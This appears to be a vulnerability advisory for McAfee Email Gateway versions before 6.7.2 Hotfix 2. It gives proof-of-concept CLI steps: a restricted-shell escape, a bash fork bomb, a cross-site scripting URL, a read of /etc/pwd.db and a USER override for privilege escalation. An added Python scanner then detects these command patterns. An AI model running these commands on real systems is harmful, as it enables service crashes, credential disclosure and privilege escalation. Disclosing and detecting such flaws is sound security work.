source: https://www.securityfocus.com/bid/39242/info

McAfee Email Gateway (formerly IronMail) is prone to multiple vulnerabilities, including:

A local privilege-escalation vulnerability
A denial-of-service vulnerability
Multiple cross-site scripting vulnerabilities
An information-disclosure vulnerability

An attacker may leverage these issues to completely compromise affected computers, execute arbitrary commands and script code, steal cookie-based authentication credentials, crash the affected application and gain access to sensitive information. Other attacks are also possible.

Versions prior to McAfee Email Gateway 6.7.2 Hotfix 2 are vulnerable.

Denial of Service:

* In order to run the DoS, follow the steps below:

[Secure Mail]: command rbash --noprofile
[Secure Mail]: :(){:|:&};:

Cross-site scripting:

https://www.example.com/admin/queuedMessage.do?method=getQueueMessages&queueMsgType=&QtnType=9

Information Disclosure:

[Secure Mail]: command rbash --noprofile
[Secure Mail]: grep -a '.*' /etc/pwd.db

Local Privilege-Escalation:

[Secure Mail]: command rbash --noprofile
[Secure Mail]: declare -x USER="admin"

If you want to check the new privilege:

[Secure Mail]: cmd_admin set user unlock
*** Invalid command: Usage - set user unlock ***
[Secure Mail]: cmd_admin set user unlock admin
Cannot unlock yourself.
[Secure Mail]: exi
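
Added example, not part of the original advisory or of McAfee's code: a Python check that scans a captured CLI transcript for the command patterns shown above (shell escape, USER override, fork-bomb definition, account database read). The "[Secure Mail]:" prompt format is taken from the advisory; the rule names, the scan() function and the sample transcript are constructed for illustration.

```python
import re

# Prompt prefix as it appears in the advisory's transcripts.
PROMPT = re.compile(r"^\[Secure Mail\]:\s*(.*)$")

# Rule names are assumptions made for this example.
RULES = [
    ("shell-escape", re.compile(r"^command\s+\S*bash\b")),
    ("identity-override",
     re.compile(r"^(?:declare\s+-\w*x\w*|export)\s+(?:USER|LOGNAME)=")),
    ("fork-bomb", re.compile(r"^(\S+?)\s*\(\)\s*\{\s*\1\s*\|\s*\1\s*&")),
    ("account-db-read", re.compile(r"/etc/s?pwd\.db\b")),
]

# Constructed sample transcript built from the commands in the advisory.
SAMPLE = """\
[Secure Mail]: command rbash --noprofile
[Secure Mail]: declare -x USER="admin"
[Secure Mail]: cmd_admin set user unlock admin
Cannot unlock yourself.
[Secure Mail]: grep -a '.*' /etc/pwd.db
"""


def scan(transcript):
    """Return one finding per operator command that matches a rule."""
    findings = []
    escaped = False  # True once a shell escape has been seen
    for number, line in enumerate(transcript.splitlines(), start=1):
        match = PROMPT.match(line.strip())
        if match is None:
            continue  # command output, not operator input
        command = match.group(1).strip()
        for name, pattern in RULES:
            if pattern.search(command):
                findings.append({"line": number, "rule": name,
                                 "after_escape": escaped, "command": command})
                if name == "shell-escape":
                    escaped = True
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Findings with after_escape set to True occurred in a session that had already left the restricted CLI, which is the condition every proof of concept above relies on.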